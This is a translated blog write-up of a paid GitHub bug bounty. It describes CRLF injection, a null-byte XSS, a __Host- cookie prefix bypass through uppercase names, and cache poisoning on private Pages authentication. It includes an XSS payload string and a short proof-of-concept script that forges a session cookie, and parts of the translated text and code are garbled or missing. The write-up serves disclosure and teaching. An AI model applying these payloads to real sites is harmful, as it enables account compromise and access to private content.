How to hack Github and make $ 35,000?

When I found and reported this vulnerability, it became my first paid bug report on HackerOne. $ 35,000 is also the highest award I have received from HackerOne (and I believe the highest payment from GitHub to date). Many of the bugs found seem to be luck and intuition combined. In this post I will tell you how I thought, approaching the goal.

How the story began

Covid struck in the spring of his first year of high school. With nothing to do in between online classes, I started hunting for bugs. Specifically, this award was for reporting the vulnerability of private Github pages as part of the Bug Bounty program. In particular, there were two CTF (capture the flag) bonuses:

  • $ 10,000 flag read without user interaction. A $ 5000 bonus for reading the flag from an account within a private organization.

  • $ 5000: read the flag through user interaction.

Authentication flow

GitHub pages are hosted on a separate domain, so authentication cookies are not sent to the private page server. So private page authentication has no way of identifying the identity of a user without additional integration with, so GitHub created its own authentication flow. And introduced the possibility of bugs. At the time of the report, this stream looked like this:

And now for more details.

When visiting a private page, the server checks if the cookie exists __Host-gh_pages_token… If this file is not installed or installed incorrectly, the private page server will redirect to… This initial redirect also sets noncewhich is stored in the cookie __Host-gh_pages_session

Please note that this cookie uses cookie prefix __Host-which, in theory, as additional protection in depth, prevents it from being installed from JS from the parent domain.

/login redirects to /pages/auth?nonce=&page_id=&path=… This endpoint then generates a temporary authentication cookie that it transmits in parameter token; nonce, page_id, and path sent in the same way.

/redirect just redirects to… This last endpoint then sets an authentication cookie for the domain, __Host-gh_pages_token and __Host-gh_pages_id… Also, along with the previously set __Host-gh_pages_session, the nonce is checked for validity.

Throughout the entire authentication flow, information such as the original request path and the page ID is stored in the request parameters – path and page_id respectively. Nonce is also passed in parameter nonce… While the authentication flow may have changed slightly (in part because of this report), the general idea remains the same.


CRLF returns

The first vulnerability is CRLF injection in a parameter page_id request

Perhaps the best way to find vulnerabilities is to play. While researching the authentication flow, I noticed that parsing the page_id seemed to be ignoring whitespace. Interestingly, it also rendered the parameter directly to the Set-Cookie header. For example, page_id = 12345% 20 returned this:

Set-Cookie: __Host-gh_pages_id=12345 ; Secure; HttpOnly; path=/

The pseudocode is presumably like this:

page_id = query.page_id


In other words, the page_id is converted to an integer and also maps directly to the Set-Cookie header. The problem was that we cannot display the text directly. Even though we had classic CRLF injection, placing any non-whitespace characters broke the whole parsing. We could interrupt the authentication flow by sending page_id=12345%0d%0a%0d%0abut other than an interesting answer, there was no immediate impact.

; Secure; HttpOnly; path=/
Cache-Control: private

Additional note: title Location: was added after the title Set-Cookieso our answer is Location pushes outside of the sent HTTP headers. This is a 302 redirect, but despite this, the title is Location ignored and the content of the body is displayed.

From dirt to Kings

After a little look at GitHub Enterprise (which gave access to the source code), I suspected that the private page server was implemented on Nginx OpenResty. Being relatively low-level, it may have had problems with null bytes. And trying is not torture, right?

It turned out that adding a null byte interrupts the parsing of the integer. In other words, you can pass a payload like this:

"?page_id=" + encodeURIComponent("rnrnx00<script>alert(origin)</script>")

Here comes the XSS!

Note that if there is a null byte in the header, the response will be rejected. Thus, a zero byte must come at the beginning of the body (this means that we cannot perform a header injection attack).

We have achieved the execution of arbitrary JavaScript on a private domain page. The only problem is you need a way to get around nonce… Parameters page_id and path are known, and nonce does not allow us to send victims downstream authentication with poisoned page_id… We need to either fix or predict nonce

Bypassing nonce

The first observation is that subdomains of the same organization can set cookies on top of each other. This is because * no in public list of suffixes… Thus installed on cookies are passed to

Nonce will be easy to bypass if we can somehow bypass the prefix protection __Host-… Just install a fake nonce to the page of the subdomain of the same level, the value will be passed below. Fortunately, this prefix is ​​not mandatory in all browsers …

Well, okay … it’s wrong to say not in all… It seems that only IE is vulnerable in the sense of this workaround. We’ll have to try. What if you attack yourself nonce? the generation looks reliable and, to be honest, cryptography is not my forte. It seemed unlikely to find a workaround for the entropy used in the nonce, no matter what. How, then, to fix nonce?

Let’s go back to the origins – RFC… Eventually I came across an interesting idea – how to normalize cookies? In particular, how cookies should be handled in upper case. "__HOST-" Is the same as "__Host-"? It is easy to see that different case cookies are treated differently in browsers:

document.cookie = "__HOST-Test=1"; // works
document.cookie = "__Host-Test=1"; // fails

It turns out that the GitHub private page server ignores capital letters when parsing cookies. And we have a prefix traversal. Now putting together a proof of concept for an XSS attack!

const id ="?id=".length)

document.cookie = "__HOST-gh_pages_session=dea8c624-468f-4c5b-a4e6-9a32fe6b9b15;";
location = "" + id + "%0d%0a%0d%0a%00<script>alert(origin)%3c%2fscript>&path=Lw";

This is already enough to earn a $ 5000 bonus. But I wanted to see if I could get ahead.

Poisoning the cache

And here’s another design flaw – it turned out that in response to the endpoint /__/auth? only integer value was cached page_id… In itself, this is harmless: the token set by this endpoint is copied to the personal page and has no other privileges.

At the same time, this design practice is somewhat questionable. The acquisition of additional privileges by tokens has the potential to be a source of security problems.

Regardless, such caching is an easy way to exacerbate an attack. Since it is done on a parsed integer value, a successful attack on the cache with an XSS payload could affect other users who have not even interacted with the malicious payload, as shown below:

The attacker controls and wants to get to… It attacks the authentication flow – and the XSS payload is cached.

When a privileged user visits, they are exposed to an XSS attack on the domain… Cookies can be installed on a common parent domain, so now the attacker can attack

These actions allow any attacker with read permissions on a private page to constantly attack the authentication flow of that page. Yo-mine!

Public and private pages

To receive the $ 15,000 bonus, you need to execute this attack from a user account that is not in the organization. And we’re lucky: we can abuse what appears to be another configuration error – dividing pages into “public” and “private”.

A mistake in the configuration of private pages allows public repositories to have their own “private” pages as well. After basic authentication, these pages are open to everyone. If an organization has such a public-private page, it is readable by any Github user. You can get access like this:

This happens when the private page repository is made public. The situation is quite plausible: for example, an organization may initially create a private repository with a corresponding private page. Later, she may decide to open source the project by changing the status of the repository to public.

In combination with the above, it turns out that an unprivileged user outside the organization can, relying on a private-public page, compromise the authentication flows of internal private pages.

Overall, this provides a good proof of concept showing how an outsider can use an employee in the organization to navigate to other private pages.

This is how we earned the maximum CTF bonus. Resilience is achieved by cache poisoning or other techniques, which we’ll leave as an exercise for the readers.


This vulnerability was given a high priority with a base payout of $ 20,000 and with the CTF bonus we earned $ 35,000. It’s pretty cool that a relatively little-known vulnerability like CRLF injection has surfaced on GitHub. Although most of the code is written in Ruby, some components, such as private page authentication, are not written in this language and may be vulnerable to low-level attacks. In general, wherever there are complex interactions, mistakes are just waiting for us to find them.

The discovered vulnerability seems to be one in a million. It’s like threading a needle – a whole series of events have to line up. At the same time, I think, in order to find something like that, you need a moderately developed intuition and skills, which you can just get on the course. Ethical hacker

find outhow to level up in other specialties or master them from scratch:

Other professions and courses

Similar Posts

Leave a Reply Cancel reply